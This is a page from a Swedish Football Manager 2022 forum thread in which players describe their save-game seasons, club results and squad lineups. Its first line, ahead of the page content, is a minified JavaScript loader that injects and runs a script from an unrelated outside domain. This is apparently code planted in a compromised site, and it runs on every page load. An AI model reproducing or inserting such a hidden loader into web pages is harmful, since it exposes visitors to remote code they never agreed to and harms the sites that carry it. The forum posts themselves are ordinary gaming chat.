;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vilket lag är du? Hur går det? – Sida 3 – Football Manager 2022 – FMSweden Forum
Meny Stäng

Vilket lag är du? H...
 
Share:
Notifications
Clear all

Vilket lag är du? Hur går det?

78 Inlägg
33 Users
115 Reactions
8,662 Visningar
Hypno
(@hypno)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 34
 

Cercle Brügge - 2024/25

Debutsäsongen under min tid i Brygge var inte dum då vi skrapade ihop 60 poäng, vilket får ses som långt över förväntan. Tyvärr räckte det "bara" till en sjundeplats då det var en hel radda lag som var riktigt bra (och en radda riktigt dåliga) men då vi var tippade en bra bit ned i tabellen är det inte kattskit. Det ledde även till att vi fick spela slutspel om den sista europaplatsen, men där drog Gent det längsta strået.

Året därpå, 23/24, var dock ett antal klasser bättre. Vi var riktigt jävla bra och ledde ligan från omgång 3 till omgång 34, dvs sista omgången. Dessutom landade vi på hela 84 poäng vilket är 14 poäng mer än vad fjolårets vinnare av grundserien, lokalrivalen Club Brügge, hade. Det är dock mer av en parentes i sammanhanget då även konkurrenterna gjorde starkare säsonger poängmässigt än de gjorde 22/23.

I mästerskapsserien fick vi sedermera tyvärr rejäl pyspunka, mycket på grund av att lagets viktigaste spelare i form av Elimane Kanouté fick sin friköpsklausul aktiverad och försvann till mellanöstern efter att grundserien avslutats. Oerhört snopet, och med det belgiska transferfönstret stängt kunde ingen ersättare tas in heller trots att rekordförsäljningen (100 mkr) klirrade rejält i den skuldtyngda kassan.

Vi vann förvisso båda derbyna mot Club Brügge i såväl mästerskapsserien som grundserien (så 4 av 4 totalt) vilket förstås är nog så gott, men förlorade alla fyra mästerskapsmatcherna mot Genk och Anderlecht trots tydligt spelövertag i tre av dessa. En snöplig andraplats, alltså. Jag hade kastat mig över en sådan topplacering inför säsongen, men nu smakar den rätt bittert. Vi får i alla fall kvala mot europaspel i år - Champions League till och med - och det primära målet just nu är att nå åtminstone Europa League då vår sinande pengakista (driftunderskott på 75 mkr) är i stort behov av den typen av ekonomisk spets.

MLi: https://www.eurobasket.com/images/Iconsflags/Croatia.gif Adrian Šemper, 26 - ny från Genoa för 3 000 000:-

OYB: https://www.eurobasket.com/images/Iconsflags/Bulgaria.gif Dimitar Velkovski, 29
SSF: https://www.eurobasket.com/images/Iconsflags/Italy.gif Massimiliano Mangraviti, 26 - ny från Brescia för 0:-
SSF: https://www.eurobasket.com/images/Iconsflags/Norway.gif Jesper Daland, 24
SSF: https://www.eurobasket.com/images/Iconsflags/Denmark.gif Frederik Tingager, 31
OYB: https://www.eurobasket.com/images/Iconsflags/Belgium.gif Robbe Decostere, 26

OSF: https://www.eurobasket.com/images/Iconsflags/Argentina.gif Enzo Barrenechea, 23 - ny från Juventus för 0:-
BMF: https://www.eurobasket.com/images/Iconsflags/Belgium.gif Benjamin van Durmen, 27 - ny från Rio Ave för 4 250 000:-
IM: https://www.eurobasket.com/images/Iconsflags/Holland.gif Branco van den Boomen, 29 - ny från Lens för 0:-

OF: https://www.eurobasket.com/images/Iconsflags/France.gif Thierry Ambrose, 27
PF: https://www.eurobasket.com/images/Iconsflags/Georgia.gif Georges Mikautadze, 23 - ny från Metz för 3 500 000:-

This post was modified 3 år sedan by Hypno

   
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 

KIRUNA FF - SÄSONG 7 & 8
DIVISION 1 NORRA 2028: 10/16 | 9 - 7 - 14 | 40-39 +1 | 34 PNG
DIVISION 1 NORRA 2029: 12/16 | 10 - 4 - 16 | 38-44 -6 | 34 PNG

ACK SÅ FEL man kan ha. Efter den gångna säsongen hade jag förhoppningar om att vi skulle kunna nå en topplacering 2028 vid ett lyckat vinterfönster. Istället visade det sig inte bli bara ett utan två ångestfyllda år nere i bottenstriden, trots att vi fått in några sköna islänningar uppe på topp. Lyckligtvis klarade vi oss båda gångerna från att trilla ur. Nu senast slapp vi negativt kval endast på grund av bättre målskillnad. 

ATT UTVECKLA KIRUNA till att bli en toppklubb och slåss om spel i Superettan känns just nu som en utopi. Två år i följd har laget känts desillusionerade redan vid säsongsstart. Ett stabilt system och samspel har varit vårt adelsmärke sedan mitt inträde, men jag känner inte längre igen min klubb. Jag har försökt väcka liv i laget och få oss mer samspelta genom diverse lagmöten och extrainsatta träningsmatcher. Förändringar i taktiken har även genomförts, men även det utan större framgång. Förhoppningsvis blir vårt maskineri mer väloljat 2030...

MÅL: Can Tufan, Sverige, 23 år (90m/28hn)

OYB: William Björk, Sverige, 28 år (56m/0m/5a)
MB: Aleksi Björklund, Finland, 23 år (102m/7m/2a)
MB: Arthur Gregory, Sverige, 23 år (198m/26m/11a)
MB: Albin Bergström, Sverige, 26 år, NY (24m/0m/1a)
OYB: Theo Backsell, Sverige, 26 år (60m/0m/9a)

MC: Daniel Jonsson, Sverige, 23 år (174m/10m/17a)
MC: Åge Fretland, Norge, 21 år (38m/1m/3a)

ANF: Egill Eyjólfsson, Island, 22 år, NY (55m/15m/6a)
ANF: Jóhannes Karl Gíslason, Island, 20 år, NY (17m/4m/0a)
ANF: Stefan Jernberg, Sverige, 23 år (200m/100m/15a)

Statistiken är från spelarnas tid med mig som manager.


   
raca14 reacted
SvaraCitera
(@palst)
Active Member
Blev medlem: 4 år sedan
Inlägg: 19
 

@argt-troll Vad hände med Filip Berglund? 🙁


   
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 
Postad av: @palst

@argt-troll Vad hände med Filip Berglund? 🙁

Berglund är kung men är mer av en truppspelare numera. Tyvärr!


   
SvaraCitera
(@tuppsterjack)
New Member
Blev medlem: 3 år sedan
Inlägg: 2
 

Ni som kör allsvenskan, tänkte tipsa om en back som är oväntat bra som jag haft i mitt HIF sen start. Gör nästan alltid bra ifrån sig, Victor Blixt:

Så här ser han ut just nu (2027):


   
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 


KIRUNA FF - SÄSONG 9
DIVISION 1 NORRA: 2/16 | 19 - 3 - 9 | 64-38 +26 | 60 PNG
UPPFLYTTADE EFTER KVAL MOT TRELLEBORGS FF (5-3)

JAG FORTSATTE EXPRIMENTERA ur en taktisk synpunkt och landade tillslut i en offensiv 433-formation under vintern 2030. In till laget hämtades därför några riktigt kompetenta, men samtidigt unga och utvecklingsbara spelare som passade in som handen i handsken i vårt nya system. Inledningsvis var jag rädd att mina justeringar snarare stjälpt än hjälpt då vi förlorade de fyra inledande omgångarna. Men sedan klickade kugghjulen i och då var vi svårstoppade. Vi öste in mål och segrar och var vid trettio spelade omgångar bara två poäng från att kröntas till mästare. Men vi kom tvåa efter Vasalunds IF och således väntade ett uppflyttningskval. Motståndet skulle skånska Trelleborgs FF stå för. Men efter 4-0 hemma på Lombia IP var det aldrig något snack. Kiruna FF hade gjort sin bästa säsong någonsin och till våren väntade spel i Superettan.

JUST NU HOPPAS jag att styrelsen vill göra oss till en proffsklubb. Under mina nio säsonger i Kiruna har vi haft ett uruselt rykte som gjort att jag aldrig kunnat handplockat en spelare. Vi bara kunnat förlita oss på att agenter ska komma och sälja på oss sina klienter. Så förhoppningsvis blir det ändring på detta och jag ges chansen att på riktigt kunna sätta min prägel på laget. Jag vill nämligen se en stor utrensning och ta in unga hungriga spelare som vill framåt i sina karriärer. Under flera års tid har jag gått igenom alla Division 2-klubbars ungdomskandidater och jag har således en lång lista med intressanta namn. Att behålla norrlandsanknytningen blir samtidigt något som jag kommer värdesätta högt. 

FÖR ÖVRIGT... fortsätter vårt U19-lag att göra bra ifrån sig. Man vann för tredje gången under savens gång andraligan och således väntar spel i U19 Högstaligan till våren!
...ser ekonomin lika blodröd ut som våra tröjor. För närvarande har vi -9 miljoner kronor i saldot och eventuella TV-pengar är minst sagt välkomna.
...har klubbikonen Stefan Jernberg, 24, gjort sin sista match i Kiruna för den här gången. Han ville ha nya utmaningar efter nio säsonger. 222 ligamatcher och 103 mål blev det. Otroligt tråkigt att han inte ville följa med upp.

MÅL: Can Tufan, Sverige, 24 år (120m/36hn)

HB: William Björk, Sverige, 29 år (74m/1m/7a)
MB:
Aleksi Björklund, Sverige, 24 år (129m/11m/5a)
MB:
Arthur Gregory, Sverige, 24 år (225m/28m/12a)
VB:
Pål Berg, Norge, 19 år, NY (21m/0m/3a)

MC: Victor Bägerfeldt, Sverige, 20 år (19m/11m/8a)
MC:
Ludvig Kallin, Sverige, 28 år, NY (25m/5m/1a)
MC:
Åge Fretland, Norge, 22 år (66m/3m/10a)

ANF: Jóhannes Karl Gíslason, Island, 21 år (45m/10m/6a)
ANF:
Tore Rossbach, Norge, 20 år, NY (30m/17m/5a)
ANF:
Stefan Jernberg, Sverige, 24 år (222m/103m/18a)


   
SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 193
 

Kiruna FF - Trelleborgs FF. Den korta resan i kvalet ? 


   
raca14 and Micke reacted
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 
Postad av: @trashbag

Kiruna FF - Trelleborgs FF. Den korta resan i kvalet ? 

Tänk då på stackars Lunds BK som av någon outgrundlig anledning fick lira Division 1 Norra. Varenda bortamatch närmare 100 mil. ? 


   
raca14 reacted
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 

KIRUNA FF - SÄSONG 10
SUPERETTAN: 14/16 | 8 - 7 - 15 | 50-68 -18 | 31 PNG
KVAR EFTER NEDFLYTTNINGSKVAL MOT VÄNERSBORG (2-1)

SOM BEKANT VILLE jag se en expansion i det organisatoriska. Att bli en proffsklubb är enligt mig ett måste för att kunna bedriva en förening långsiktigt på hög nivå. Men där vågade inte styrelsen ta klivet under året, trots mitt eviga tjat. Istället blev vintern skrämmande lik det senaste decenniet. Inga spelare från min nu 200 man stora önskelista var intresserade av att spela Superetta-fotboll, trots att de själva huserade i spannet Division 2 & 1. Där och då hade jag lite panik i mars månad när jag stod utan någon nämnvärd förstärkning och med en tunnare trupp än säsongen innan. Men som vanligt blev vi räddade av agenter. Vips hade vi nu värvat tre argentinare (!), en finne, en islänning och senare under sommarfönstret en dansk. Det var den norrlandsanknytningen som jag är så angelägen om att bevara.

JAG VET INTE riktigt hur jag ska beskriva vårt nykomlingsår i Superettan. I det stora hela, eller rättare sagt de två första tredjedelarna, gör vi det med den äran och har fem poäng ned till strecket. Vi fullkomligt öser in mål, samtidigt som vi i och för sig läcker som ett såll bakåt. Men så kraschade vi rakt in i väggen och gick segrande ur endast två av de fjorton sista striderna. Den heta offensiven svalnade, samtidigt som försvaret fortsatte på inslagen väg. Med lite flyt fick vi i alla fall kvala och där var vi lyckligtvis numret större än Vänersborg. Jag ser trots slutskedet på säsongen fram emot en ny vår. Vi har en ung och hungrig trupp som bara kommer att bli bättre och dessutom måste väl styrelsen snart inse att vi behöver professionalisera Kiruna FF?!

FÖR ÖVRIGT... lämnar nu en riktig trotjänare Kiruna FF. Arthur Gregory gillade inte att vara tredjevalet i mittlåset och valde att avsluta sitt kontrakt efter 235 ligamatcher i sin moderklubb. Oerhört tråkigt.

MÅL: Can Tufan, Sverige, 25 år (150m/40hn)

HB: Tapio Riikonen, Finland, 23 år, NY (14m/1m/1a)
MB:
Mauricio Martorell, Argentina, 20 år, NY (22m/3m/0a)
MB:
Aleksi Björklund, Finland, 25 år (154m/13m/5a)
VB:
Ricardo Manassero, Argentina, 18 år, NY (22m/0m/3a)

MC: Åge Fretland, Norge, 23 år (91m/9m/13a)
MC: 
Björn Henriksen, Island, 22 år, NY (26m/5m/3a)
MC: 
Emilio Goudelias, Argentina, 20 år, NY (20m/0m/1a)

ANF: Egill Eyjólfsson, Island, 24 år (110m/30m/13a)
ANF: 
Tore Rossbach, Norge, 21 år (59m/26m/12a)
ANF:
 Hussein Diab, Libanon, 19 år, LÅN (27m/10m/3a)


   
raca14 reacted
SvaraCitera
Challa
(@challa)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 128
 

@argt-troll tråkigt med sydamerikaner

Mitt liv är en multimediafil


   
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 
Postad av: @challa

@argt-troll tråkigt med sydamerikaner

Säg det till Dybala.


   
SvaraCitera
(@nollan)
New Member
Blev medlem: 3 år sedan
Inlägg: 1
 

Tja, 

Ny medlem här efter att ha hittat tillbaka till FM efter 6års frånvaro. Hade helt glömt vad fantastikt beroendeframkallande FM är. 

 

Jag började min save på realese dagen och har spelat den sen dess.

GIF Sundsvall:

2021: Slutade 2 i superettan efter ett stabilt första år. Klassikt 4-4-2. Många unga löften för framtiden men med en stabil ryggrad. Englblom och Hallenius är sjukt effektiva, Engblom specielt. Bengtsson, Eriksson, Olsson, Andersson och Blomqvist är alla kompetenta. Klassikt 4-4-2

 

2022: Slutade 4 efter ett extremt bra första år. Klassikt 4-4-2. Återigen är Engblom en nyckelspelare och öser in mål. Bengtson, Eriksson och Andersson har utvecklats till riktiga bra löften. Tyvärr får jag inte behålla Eriksson som går till Cagliari för 1.2 milj. Bra pengar men tappade en viktig kugge. Köper in Boateng som ersättare. 

 

2023: Slutar 2a. Bra placering och kvalificerar in till EL. Byter taktik  till Vertikal Tiki taka då jag upplever att vi har problem att skapa chanser. Nåvik utvecklas bra på innermitten och växer till en nyckelspelare. Genererar lite transfer pengar i och med min slutplacering. 

 

2024: 1: Vinner ligan! Fantastik säsong. Engblom, Boateng och Bengtsson är nyckelspelare. Otroligt starka och öser in mål. Tiki taka funkar inte riktigt så halvägs byter jag tillbaka till 4-4-2. Skapar dåligt med chanser med gör åtminstående mål på dem. Kvalificerar mig också till gruppspelet i EL och får in endel pengar på det. Slutar 2 i gruppen men åker ut direkt sen. Gonzales och Högblom kommer in i laget för dyra summor. Men går direkt in i startelvan och levererar bra. Gonzales är en klassspelare. Lyckas även locka till mig en klass målvakt (Hoffman) som går som bossman till mig vid jul. Och jävlar vad bra han är, 4/5 sjärnor.   

 

2025: 1: Vinner ligan! Köper tidigt in Boniface (4 sjärnor ytter/ST) och han är så bra! Jag byter återigen spelsystem till Gengenpress (4-2-3-1). Det funkar kanon, skapar sjukt med chanser vilket är roligt. Hellenius går i pension, efter en säsong mest på bänken. Kvalar rätt enkelt vidare till CL gruppspel och får finfina pengar till transfers, men slutyar sist i gruppen. Styrelsen bestämmer att vi ska bygga ut med 2k platser vilket är trevligt. Jag förlänger kontraktet med krav att ugdomsakadamin förbättras. Säljer Bengtsson för 1,5milj till Italien och Nåvik utecklas fortfarande till en av de viktigaste spelarena ihop med Gonzales, Boniface, Anderson och Boateng. Englblom går i pension. Tappar Hoffman, vilket inte är så konstigt med tanke på hans kvaliteer. Blir dock en ren vinstaffär eftersom han kom gratis. 

 

2026. 1:a Vinner återigen ligan. Tidigare vinsterna gör det lättare att locka över spelare och personal. Nya spelare som Roles, Enersen och Mennert är viktiga och lyfter laget.  Spelarna är dock superslitna och det tar att kombinera ligan med att spela CL. Efter tuffa matcher i kvalet tar jag mig vidare till gruppspelet.  Väl där får jag möta Porto, Rangers och Bayern M. Upplever det som rätt enkla matcher, betydligt enklare än kvalet dit. Jag tar mig vidare som 2:a efter bayern (4 segrar). Får möta ajax i första slutspels matchen och vinner efter 2 tuffa matcher. Åker dock ut mot Real Madrid sen, men det genererar mycket pengar. Inför 2027 måste jag köpa in flertal bra spelare för att kunna konkurerra och framförallt måste jag få in svenska spelare då jag ofta har problem att få ihop 9st...

Köper in Svejert för 6milj, Augustinsson för 8 milj och Hover för 5 milj efter säsongen och hoppas att det ska löna sig att satsa hårt. Jag har slut på pengar och löne-kostnaderna börjar bli höga...

 

2027:

Vunnit 2 av 2 och laget går bra. Men har problem med att dom är så slitna. CL fuckar vekligen upp försäsongen och det känns inte som jag hinner bygga upp någon stamina och fitness. Spelschemat är tufft och det är match var 3:e dag. Hoppas det lättar upp men snart börjar också kvalet till CL igen...

 

Kan posta mitt lag sen när jag kommer hem :). 

 

MVH

 

 

 

 

 

 

 

This post was modified 3 år sedan by Nollan

   
Argt Troll and raca14 reacted
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 

KIRUNA FF - SÄSONG 11
SUPERETTAN 4/16 | 17 - 3 - 10 | 59-44 +15 | 54 PNG -
IN: 6 SPELARE (0K) | UT: 2 SPELARE UT (0K)

MED RISK FÖR att låta bortskämd så är jag riktigt besviken på mitt lag. Detta trots att vår fjärdeplats hade betraktats som en bragd inför säsongen. Vi hade nämligen allt i egna händer när vi klev in i den 28:e ligaomgången. En ynka seger under de tre avslutande omgångarna hade räckt för en kvalplats, minst. Skulle vi ta två segrar skulle även andraplatsen och tillika direktuppflyttningen till Allsvenskan vara ett faktum. Men vad gör vi? Jo, vi tappar två stycken 2-0-ledningar mot Landskrona och Öster i slutminuterna. Sedan när vi kan nå en upprättelse så tappar vi även en ledning mot Sandviken i den avslutande omgången och faller ihop totalt (2-4). Sämst när det gäller. Kiruna FF.

SKA MAN FÖRSÖKA att se mer nyktert på det hela så gör vi, avslutningen till trots, en riktigt bra säsong. Truppen var till stora delar densamma jämfört med den föregående säsongen. Startelvan såg identisk ut bortsett från att två unga spelare från Australien respektive Barbados spetsat till mittfältet. Då vi har bland de yngsta trupperna i Superettan så förutspådde jag att vi skulle utvecklas och göra en bättre säsong, men inte att vi skulle klättra och bli ett topplag. Förhoppningsvis fortsätter vi på inslagen väg även nästa år, men då får gärna styrelsen gå med på att bli en proffsklubb. Det börjar bli smått komiskt att vi kan få in kvalitativa utländska stjärnor, men inte ens ha ryktet till att intressera de flesta svenska spelarna från Division 2. Efter fjärdeplatsen trillade det in och några sköna miljoner, vilket gör att vi nu har det gott ställt ekonomiskt med några miljoner plus på saldot. Agera, styrelsen!

FÖR ÖVRIGT... har Aleksi Björklunds karriär fått ett abrupt break. Finnen drog korsbandet under hösten och är nu borta fram tills sommaren. Jag behöver hitta en ersättare. Fort.

MÅL: Can Tufan, Sverige, 26 år (180m/50hn)

HB: Tapio Riikonen, Finland, 24 år (39m/1m/6a)
MB:Mauricio Martorell, Argentina, 21 år (48m/4m/0a)
MB:Aleksi Björklund, Finland, 26 år (170m/15m/5a)
VB:Ricardo Manassero, Argentina, 19 år (45m/0m/7a)

MC:Åge Fretland, Norge, 24 år (120m/14m/21a)
MC:Kenville Howell, Barbados, 19 år, NY (11m/2m/1a)
MC: Giorgio Pellecchia, Australien, 21 år, NY (28m/10m/4a)

ANF: Egill Eyjólfsson, Island, 25 år (136m/37m/20a)
ANF:Erik Eg, Danmark, 18 år (32m/10m/6a)
ANF: Hussein Diab, Libanon, 20 år, LÅN (54m/19m/8a)


   
SvaraCitera
Hypno
(@hypno)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 34
 

Fiorentina - 2026/27

Efter att för andra året i rad ha tappat förstaplatsen i allra sista omgången och därmed missat guldet så klarade inte mitt psyke av fler mästerskapsserier varvid jag avgick från Cercle Brügge. Helt deppig var jag dock inte, för vi bärgade hem cupen efter en total överkörning i finalen och tog således i alla fall en titel under mina tre år i Belgien.

Istället sökte jag mig till ett nytt land. Jag blev kallad på intervju till två intressanta jobb: turkiska mästarna Fenerbahce och italienska ligasjuan Fiorentina. Fenerbahce var förmodligen det säkraste kortet till fler titlar och förbättrat rykte, men för egen del väger det likväl ganska lätt att träna i Turkiet mot att träna i Italien. Istanbul i all ära, men det är klart att Florens är charmigare.

Viola hade under Vincenzo Italiano varit ett stabilt lag på den övre halvan där man hamnat 9, 7, 8, 7 under åren som gått in-game. Italiano tog passande nog dock över som förbundskapten för Italien inför 25/26 vilket öppnade dörren för mig. Lite oväntat ändå att man valde att gå på min manager som hade ett relativt svagt rykte. Hur som haver tog jag över en väldigt liten trupp till följd av många försäljningar men få nyförvärv, god ekonomi och en väl tilltagen transferbudget vilket var väldigt välkommet efter de skrala åren i Brygge.

Pengarna investerades och resultaten kom omgående. Vi gick väldigt starkt redan från början och även om vi aldrig var i närheten av titeln så slutade vi på en mycket respektabel tredjeplats efter att ha passerat Juventus i sista omgången. Framför allt var det ett extremt starkt hemmaspel som lade grunden till framgångarna. I cupspelet föll vi dock bort tidigt medan vi i ECL lyckades gå hela vägen till finalen. Väl där fick vi möta tvåan från vår egen grupp - Dynamo Moskva. Ett lag vi hade slagit i båda mötena med totalt 6-2. Döm då min förvåning när vi hade förtvivlat svårt att ta kommandot i finalen och istället åkte på en oerhört svidande strafftorsk. Att falla på målsnöret börjar bli en vana i denna sparning.

Till kommande säsong ämnar jag framför allt plocka in en stark målvakt då Audero inte varit stabil i målet och dessutom visat sig vara skadebenägen. Fler nyförvärv än så lär antagligen ske då det finns en hel del intresse för våra lirare, men vilka som lämnar och tillkommer är ovisst i dagsläget. Nedan är den toppade startelvan från fjolåret, där de spelare jag själv värvat är märkta med prislapp. Kan nämnas att klubben totalt under säsongen innan och efter min ankomst köpte spelare för 1,6 miljarder och sålde för exakt lika mycket.

Bland individuella spelare noteras supertalangen Vidovsek som i vintras utsågs till världens näst största talang. Nytillkomne Iheanacho var lagets bästa målskytt med 19 ligamål medan Juan Bernat hade bäst snittbetyg och Adam Hlozek något oväntat blev fansens val av årets spelare efter en säsong som supersub.

MLi: https://www.eurobasket.com/images/Iconsflags/Italy.gif Emil Audero, 29

OYB: https://www.eurobasket.com/images/Iconsflags/Spain.gif Juan Bernat, 33
SSF: https://www.eurobasket.com/images/Iconsflags/Italy.gif Andrea Carboni, 25 - från Atalanta för 107 000 000:-
SSF: https://www.eurobasket.com/images/Iconsflags/Italy.gif Matteo Gabbia, 26 - från Sassuolo för 175 000 000:-
SSF: https://www.eurobasket.com/images/Iconsflags/Colombia.gif Davinson Sanchez, 29
OYB: https://www.eurobasket.com/images/Iconsflags/Spain.gif Guille Rosas, 26 - från Atletico Madrid för 230 000 000:-

DSF: https://www.eurobasket.com/images/Iconsflags/Slovenia.gif Martin Vidovsek, 18 - från Maribor för 13 000 000:-
IM: https://www.eurobasket.com/images/Iconsflags/Italy.gif Gaetano Castrovilli, 29

IF: https://www.eurobasket.com/images/Iconsflags/Italy.gif Riccardo Sottil, 26
OF: https://www.eurobasket.com/images/Iconsflags/nigeria.gif Kelechi Iheanacho, 29 - från Leicester för 355 000 000:-

IF: https://www.eurobasket.com/images/Iconsflags/argentina.gif Nicolás González, 28

This post was modified 3 år sedan by Hypno

   
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 

KIRUNA FF - SÄSONG 12
SUPERETTAN: 9/16 | 12 - 8 - 10 | 46-41 +5 | 44 PN
IN: 7 SPELARE (300K) | UT: 1 SPELARE (0K)

DET VAR EN känsla av besvikelse i fjol när säsongen skulle summeras. Detta efter att vi tappade avancemanget till Allsvenskan på rent slarv. Efter denna säsongen kanske jag borde vara förbannad på vår tabellposition, men jag tycker verkligen vi gör bra prestationer nästan hela säsongen. Inledningsvis var laget lite osammansvetsat efter lite nya konstellationer i startelvan, men därefter spelar vi allt som oftast en fantastisk fotboll. Men det var främst två skäl som gjorde att vi hamnade på en niondeplats och inte nådde någon topplacering. Först och främst blir det svårt och nå särskilt långt om ens lag har brutala disciplinära problem. Det haglade avstängningar på våra spelare efter att vi drog på oss hela nio röda kort och nittionio gula kort. Detta bidrog till att det blev onödigt många variationer i startelvan. Anledning nummer två är att man måste sätta sina chanser. Vi hade överlägset högst xG av alla lagen i Superettan, men dessvärre visade sig våra anfallare inte från sina bästa sidor. 

TILL NÄSTA SÄSONG anser jag att vi har de flesta pusselbitarna på plats för att kunna nå en topplacering. Detta trots att vi tappar vår kanske bästa spelare i den argentinska mittbacken Mauricio Martorell som lämnar som bosman. Bortsett från att hitta en ersättare där så behöver laget bara få in en riktig målskytt och fler svenska spelare. Den sistnämnda punkten är som alltid den svåraste av någon anledning. Vi har fortsatta problem med att vara attraktiva på den svenska marknaden. Jag både tror och hoppas på att vi får till en förbättring på den fronten så fort vi når en proffsstatus. Men styrelsen fortsätter vara rädda för att expandera.

MÅL: Can Tufan, Sverige, 27 år (210m/59hn)

HB: Tapio Riikonen, Finland, 25 år (65m/2m/8a)
MB:
Mauricio Martorell, Argentina, 22 år (73m/9m/0a)
MB:
Joe Hopkins, Wales, 19 år, NY (9m/1m/0a)
VB:
Ricardo Manassero, Argentina, 20 år (69m/0m/8a)

MC: Jesper Larsen, Danmark, 23 år, NY (26m/2m/6a)
MC:
Kenville Howell, Barbados, 20 år (36m/4m/6a)
MC:
 Giorgio Pellecchia, Australien, 22 år (53m/20m/8a)

ANF: Ole-Jörgen Vollan, Norge, 23 år, NY (28m/6m/6a)
ANF:
Erik Eg, Danmark, 19 år (62m/18m/12a)
ANF:
 Hussein Diab, Libanon, 21 år, LÅN (79m/28m/12a)


   
raca14 reacted
SvaraCitera
(@pcch7)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 57
 

Semin i Coppa Italia känns ganska avgjord efter första matchen. Effektivitet var dagens ord, för båda lagen får man ju säga.


   
SvaraCitera
Hypno
(@hypno)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 34
 

Fiorentina - 2027/28

Första ligasegern (och blott andra titeln) sedan sparningens debutsäsong inkasserad! Vi gick som tåget hela säsongen där vi var starkare både framåt och bakåt än tidigare. Scudetton satt dock väldigt hårt åt då Milan, precis som tidigare, även de var väldigt stabila. Titeln bärgades först i sista omgången efter att vi blivit utspelade av Inter av alla lag, som uppenbarligen gjorde allt för att säkra Milano-rivalens titel, men fotbollsgudarna var med oss. En oerhört skön seger och titelvinst efter alla gånger jag fallit på målsnöret tidigare i sparningen.

I cupspelet åkte vi ut relativt tidigt (kvartsfinal) i år igen, men i Champions League skämde vi verkligen inte bort oss utan nådde en hedrande semifinal. Väl där blev dock Liverpool - som spelat CL-final samtliga sex säsonger denna sparning - för svåra. Likväl en prestation vi kan vara extremt nöjda med med tanke på att vi gick vidare från en grupp där vi mötte både Arsenal och Bayern München, och sedan dessutom slog ut Manchester City och Inter innan framfarten stoppades.

Till kommande säsong har det skett rockader. En hel del av våra spelare var eftertraktade på transfermarknaden efter succésäsongen - exempelvis såldes Luka Romero som hade spelat till sig en ordinarie plats för en dryg miljard, medan vår nyinköpta målvakt Álvaro Fernández framgångsrikt krigade fram en övergång till Real Madrid för en liknande summa på deadline day vilket ledde till att vi panikvärvade en transferlistad Diogo Costa för rekordsumma. Kanske kunde jag haft lite is i magen och förlitat mig på en sämre målvakt fram till januari, men "pengar är till för att spenderas" som min moster brukar säga.

Huvudmålet för i år är förstås att försvara ligatiteln. Samtidigt förfogar jag nu över en väldigt bred trupp, så det är klart att ribban ska läggas på en annan nivå än tidigare i övriga tävlingar också. Att vi ens nådde semifinal i CL förra året var över all rimlig förväntan, i år däremot är det just den nivån jag tycker vi ska sikta på. Samtidigt har vi inte samma världsklasspets som de allra bästa lagen.

Spelare med summor markerade är de jag värvat nu under sommaren inför kommande säsong.

MLi: https://www.eurobasket.com/images/Iconsflags/Portugal.gif Diogo Costa, 28 - från Tottenham för  670 000 000:-

OYB: https://www.eurobasket.com/images/Iconsflags/Germany.gif Luca Netz, 24 - från Mönchengladbach för 530 000 000:-
SSF: https://www.eurobasket.com/images/Iconsflags/Slovenia.gif Martin Vidovsek, 20
SSF: https://www.eurobasket.com/images/Iconsflags/Italy.gif Caleb Okoli, 26 - från Roma för 150 000 000:-
OYB: https://www.eurobasket.com/images/Iconsflags/Italy.gif Raoul Bellanova, 27 - från Mainz för 190 000 000:-

OSF: https://www.eurobasket.com/images/Iconsflags/Italy.gif Gaetano Castrovilli, 30
BMF: https://www.eurobasket.com/images/Iconsflags/Italy.gif Roberto Gagliardini, 33
LM: https://www.eurobasket.com/images/Iconsflags/Serbia.gif Dusko Djordjevic, 20

PF: https://www.eurobasket.com/images/Iconsflags/argentina.gif Maximiliano Rodríguez, 20
BM: https://www.eurobasket.com/images/Iconsflags/Italy.gif Lorenzo Lucca, 27 - från Lazio för 510 000 000:-

PF: https://www.eurobasket.com/images/Iconsflags/Italy.gif Giacomo Raspadori, 27

This post was modified 3 år sedan 2 times by Hypno

   
Argt Troll reacted
SvaraCitera
(@laving)
New Member
Blev medlem: 3 år sedan
Inlägg: 1
 

Dominerade i två matcher mot de där jävla österrikarna i Champions League-kvalet, men torskade båda matcherna med 1-0. Ingen vet hur det gick till.

Krossa Rangers med 4-0? Inga problem.
Starta ligan med 19-0 i målskillnad på 7 matcher? Lätt som en plätt.
Lottas i samma grupp som de där jävla österrikarna i Europa League? Yes! Revansch ska utkrävas!
Spela Marseille av banan? Barnmat!
Dominera för tredje gången mot de där jävla österrikarna, och torska med 1-0 IGEN? Skjut mig! Det blir B-laget nästa gång!!!

This post was modified 3 år sedan by laving

   
Argt Troll reacted
SvaraCitera
Svempa
(@svempa)
Active Member
Blev medlem: 4 år sedan
Inlägg: 7
 

Kan va de jävligaste jag sett


   
Jonathan and Argt Troll reacted
SvaraCitera
raca14
(@raca14)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 225
 

@svempa Vilket jävla monster!


   
SvaraCitera
Sida 3 / 4
Share: